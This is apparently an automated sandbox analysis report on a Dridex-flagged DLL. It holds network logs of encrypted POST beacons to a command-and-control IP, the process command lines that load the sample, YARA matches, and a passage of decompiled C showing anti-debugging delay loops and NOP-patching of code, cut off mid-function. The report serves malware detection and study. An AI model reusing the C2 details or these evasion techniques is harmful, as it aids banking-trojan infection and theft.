2	192.168.2.3	49752	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:11:20 UTC	9	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:11:20 UTC	9	OUT	Data Raw: e9 14 ae 38 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 8#QZK?)D5=>\F[{!@}<60k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:11:21 UTC	14	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:11:21 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49753	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:11:21 UTC	14	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:11:21 UTC	14	OUT	Data Raw: 0b 5c 98 14 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: \#QZK?)D5=>\F[{!@}<60kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:11:22 UTC	19	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:11:22 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49760	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:11:28 UTC	19	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:11:28 UTC	19	OUT	Data Raw: e9 14 ae 38 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 8#QZK?)D5=>\F[{!@}<60k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:11:28 UTC	29	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:11:28 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49761	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:11:28 UTC	24	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:11:28 UTC	24	OUT	Data Raw: 0b 5c 98 14 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: \#QZK?)D5=>\F[{!@}<60kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:11:29 UTC	29	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:11:29 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49768	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:11:36 UTC	29	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:11:36 UTC	29	OUT	Data Raw: e9 14 ae 38 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 8#QZK?)D5=>\F[{!@}<60k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:11:37 UTC	34	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:11:36 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49769	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:11:37 UTC	34	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:11:37 UTC	34	OUT	Data Raw: 0b 5c 98 14 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: \#QZK?)D5=>\F[{!@}<60kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:11:37 UTC	39	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:11:37 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49776	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:11:43 UTC	39	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:11:43 UTC	39	OUT	Data Raw: e9 14 ae 38 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 8#QZK?)D5=>\F[{!@}<60k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:11:44 UTC	44	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:11:44 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49779	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:11:44 UTC	44	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:11:44 UTC	44	OUT	Data Raw: 0b 5c 98 14 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: \#QZK?)D5=>\F[{!@}<60kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:11:45 UTC	49	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:11:45 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 4248 Parent PID: 4664

General

Start time:	05:10:01
Start date:	28/10/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll'
Imagebase:	0x1370000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000003.431718268.00000000009E0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 2248 Parent PID: 4248

General

Start time:	05:10:02
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5016 Parent PID: 4248

General

Start time:	05:10:02
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Bluewing
Imagebase:	0x380000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000003.396279024.0000000004910000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6340 Parent PID: 2248

General

Start time:	05:10:02
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1
Imagebase:	0x380000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000003.404224619.0000000004740000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.690890687.000000006E9F1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6332 Parent PID: 4248

General

Start time:	05:10:07
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Earth
Imagebase:	0x380000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000003.420461174.0000000004120000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6352 Parent PID: 4248

General

Start time:	05:10:11
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Masterjust
Imagebase:	0x380000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000005.00000003.429863191.0000000003410000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 4248 Parent PID: 4664 loaddll32.exeCOMMON

Executed Functions

Function 6E9F51A7, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 235
sleepCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E6E9F51A7(void* __edi, signed int __esi) {
				void* _t190;
				signed int _t192;
				signed int _t198;
				signed int _t200;
				void* _t203;
				signed int _t211;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t239;
				intOrPtr _t240;
				intOrPtr* _t244;
				void* _t259;
				void* _t269;
				intOrPtr _t272;
				signed int _t282;
				signed int _t286;
				void* _t301;
				intOrPtr* _t302;
				signed int _t305;
				unsigned int _t309;
				intOrPtr _t312;
				signed short* _t313;
				signed int _t316;
				signed int _t333;
				signed int _t334;
				signed int _t339;
				char* _t347;
				char _t349;
				signed int _t360;
				signed int _t361;
				void* _t362;
				void* _t363;
				void* _t364;
				signed int _t368;
				signed int _t369;
				signed int _t372;
				signed int _t373;
				void* _t378;
				signed int _t379;
				intOrPtr* _t434;
				intOrPtr* _t442;
				signed int _t457;
				signed int _t459;
				signed int _t462;
				signed int _t494;
				signed int _t496;
				intOrPtr* _t502;
				signed int _t503;
				signed int _t523;
				signed int _t527;
				void* _t532;
				signed int _t533;
				void* _t540;
				void* _t541;
				void* _t542;
				void* _t543;
				intOrPtr* _t544;
				intOrPtr* _t545;
				void* _t548;
				intOrPtr _t551;
				intOrPtr _t552;
				intOrPtr* _t553;

				_t530 = __esi;
				_t526 = __edi;
				E6EA15CB0(_t553 + 0xdc, 3, 0x28, 0x64);
				_t361 = 0;
				_t540 = _t553 + 0x1e4;
				while(1) {
					E6EA15CB0(_t540, 3, 0x14, 0x50);
					OutputDebugStringA( *(_t553 + 0x1e4));
					Sleep(0xa);
					E6EA10B10(_t540);
					_t361 = _t361 + 1;
					if(_t361 >= 0xbebbe7c) {
						break;
					}
					while(_t361 >= 0x137b) {
						_t361 = _t361 + 1;
						if(_t361 < 0xbebbe7c) {
							continue;
						} else {
							OutputDebugStringA( *(_t553 + 0xd4));
						}
						goto L5;
					}
				}
				L5:
				_t362 = 0;
				_t541 = _t553 + 0x1ec;
				while(1) {
					E6EA15CB0(_t541, 3, 0x14, 0x50);
					OutputDebugStringA( *(_t553 + 0x1ec));
					Sleep(0xa);
					E6EA10B10(_t541);
					_t362 = _t362 + 1;
					if(_t362 >= 0xbebbe7c) {
						break;
					}
					while(_t362 >= 0x137b) {
						_t362 = _t362 + 1;
						if(_t362 < 0xbebbe7c) {
							continue;
						} else {
							OutputDebugStringA( *(_t553 + 0xd4));
						}
						goto L10;
					}
				}
				L10:
				_t363 = 0;
				_t542 = _t553 + 0x1f4;
				while(1) {
					E6EA15CB0(_t542, 3, 0x14, 0x50);
					OutputDebugStringA( *(_t553 + 0x1f4));
					Sleep(0xa);
					E6EA10B10(_t542);
					_t363 = _t363 + 1;
					if(_t363 >= 0xbebbe7c) {
						break;
					}
					while(_t363 >= 0x137b) {
						_t363 = _t363 + 1;
						if(_t363 < 0xbebbe7c) {
							continue;
						} else {
							OutputDebugStringA( *(_t553 + 0xd4));
						}
						goto L15;
					}
				}
				L15:
				_t364 = 0;
				_t543 = _t553 + 0x1fc;
				while(1) {
					E6EA15CB0(_t543, 3, 0x14, 0x50);
					OutputDebugStringA( *(_t553 + 0x1fc));
					Sleep(0xa);
					E6EA10B10(_t543);
					_t364 = _t364 + 1;
					if(_t364 >= 0xbebbe7c) {
						break;
					}
					while(_t364 >= 0x137b) {
						_t364 = _t364 + 1;
						if(_t364 < 0xbebbe7c) {
							continue;
						} else {
							OutputDebugStringA( *(_t553 + 0xd4));
						}
						goto L20;
					}
				}
				L20:
				E6EA10B10(_t553 + 0xd4);
				_push(0x755aa3f0);
				if(L6EA07560() != 0) {
					_t347 = L6EA015C0(0x588ab3ea, 0x1be15feb);
					if( *_t347 == 0xe9) {
						_t149 =  *((intOrPtr*)(_t347 + 1)) + 5; // 0x5
						_t378 = _t347 + _t149;
						_t494 = L6EA015C0(0x588ab3ea, 0x3b4caff7);
						__eflags = _t494;
						if(_t494 == 0) {
							L137:
							_t551 =  *0x6ea29414; // 0x3f7883
							_t349 =  *0x6ea2941a; // -16
							 *((intOrPtr*)(_t553 + 0xdc)) = _t551;
							 *((short*)(_t553 + 0xe0)) =  *0x6ea29418 & 0x0000ffff;
							 *((char*)(_t553 + 0xe2)) = _t349;
							_t530 =  *(_t553 + 0x6c);
							_t552 =  *((intOrPtr*)(_t553 + 0x78));
							while(1) {
								_push(0x3f);
								_push(7);
								_push(_t553 + 0xe4);
								_t379 = E6EA00DA0(_t530, _t552);
								__eflags = _t379;
								if(_t379 == 0) {
									goto L23;
								}
								 *(_t553 + 0xec) = _t379;
								 *((intOrPtr*)(_t553 + 0xf0)) = 0x10;
								_t552 = _t552 -  ~_t530 + _t379 + 7;
								 *((intOrPtr*)(_t553 + 0xf4)) = 0x40;
								_t160 = _t379 + 7; // 0x7
								_t530 = _t160;
								_t496 = L6EA015C0(0x588ab3ea, 0x649746ec);
								__eflags = _t496;
								if(_t496 != 0) {
									_t526 = _t553 + 0xf0;
									 *_t496(0xffffffff, _t553 + 0xec, _t553 + 0xf0,  *((intOrPtr*)(_t553 + 0xf8)), _t553 + 0xf4);
								}
								 *((char*)(_t379 + 5)) = 0x90;
								 *((char*)(_t379 + 4)) = 0x90;
								_t523 = L6EA015C0(0x588ab3ea, 0x649746ec);
								__eflags = _t523;
								if(_t523 != 0) {
									_t526 = _t553 + 0xec;
									 *_t523(0xffffffff, _t553 + 0xec, _t553 + 0xf0,  *((intOrPtr*)(_t553 + 0xf8)), _t553 + 0xf4);
								}
							}
							goto L23;
						} else {
							_t360 =  *_t494(0xffffffff, _t378, 0, _t553 + 0x6c, 0x1c, 0);
							__eflags = _t360;
							if(_t360 != 0) {
								goto L23;
							} else {
								goto L137;
							}
						}
						L143:
					}
				}
				L23:
				E6E9F1270(_t526, _t530);
				 *((intOrPtr*)(_t553 + 0x12c)) = 0x2800;
				_push(0x2800);
				E6EA19350(_t553 + 0xfc);
				_t544 = E6EA19640(_t553 + 0xfc, 0);
				_t502 = L6EA015C0(0xd93f3271, 0xa1ee59b);
				if(_t502 != 0) {
					 *_t502(_t544, _t553 + 0x12c); // executed
				}
				if(_t544 != 0) {
					_t530 = 0x4b005452;
					do {
						if(( *((intOrPtr*)(_t544 + 0x194)) - _t530 | ( *(_t544 + 0x198) & 0x0000ffff) - 0x000031a1) == 0) {
							L6E9F5150();
						}
						_t544 =  *_t544;
					} while (_t544 != 0);
				}
				L6EA19510(_t553 + 0xf8);
				E6EA08810(_t553 + 0x108, 0);
				 *0x6ea2b1c8 = _t553 + 0x108;
				_t190 = L6EA015C0(0xa1310f65, 0xe10858ef);
				if(_t190 == 0) {
					__eflags = 0;
					_t192 = L6EA015C0(0x1b47f147, 0x4c00b324);
					__eflags = _t192;
					if(_t192 == 0) {
						 *0x6ea2b1d0 = 0;
						_t545 = E6EA03930(0, 0, _t526, _t530);
						__eflags =  *_t545 - 0x10;
						if( *_t545 < 0x10) {
							L6E9F5150();
						}
						E6E9F6020(0);
						E6EA08810(_t553 + 0x114, 0x200);
						_t503 = L6EA015C0(0xa1310f65, 0xc4d11e8a);
						__eflags = _t503;
						if(_t503 != 0) {
							_t339 =  *(_t553 + 0x114) >> 1;
							__eflags = _t339;
							 *_t503(0,  *(_t553 + 0x114), _t339);
						}
						E6EA02580(_t553 + 0x118, _t526, _t530);
						_t198 = E6EA09C70(_t553 + 0x114, _t526,  *((intOrPtr*)(_t553 + 0x118)));
						__eflags = _t198;
						if(_t198 == 0) {
							E6EA02780(_t553 + 0xe4, _t526, _t530);
							_t200 = E6EA09C70(_t553 + 0x114, _t526,  *((intOrPtr*)(_t553 + 0xe4)));
							__eflags = _t200;
							if(_t200 == 0) {
								E6EA02580(_t553 + 0xb4, _t526, _t530);
								_t530 = _t553 + 0x98;
								E6EA0D980(_t553 + 0xbc, _t553 + 0x98, 0x5c);
								_t203 = E6EA17600(_t553 + 0x98, 2);
								E6E9FAC00(_t553 + 0xbc, 6);
								E6EA08CC0(_t203,  *((intOrPtr*)(_t553 + 0xbc)));
								E6EA08CA0(_t553 + 0xbc);
								L6EA189F0(_t530, _t553 + 0x124, 0x5c);
								L6EA18910(_t530, _t526, _t530);
								E6EA08CA0(_t553 + 0xb4);
								_t211 = E6EA09C70(_t553 + 0x114, _t526,  *((intOrPtr*)(_t553 + 0x120)));
								__eflags = _t211;
								_t46 = _t211 > 0;
								__eflags = _t46;
								_t368 = 0 | _t46;
								E6EA08CA0(_t553 + 0x120);
							} else {
								_t368 = 1;
							}
							E6EA08CA0(_t553 + 0xe4);
							E6EA08CA0(_t553 + 0x118);
							__eflags = _t368;
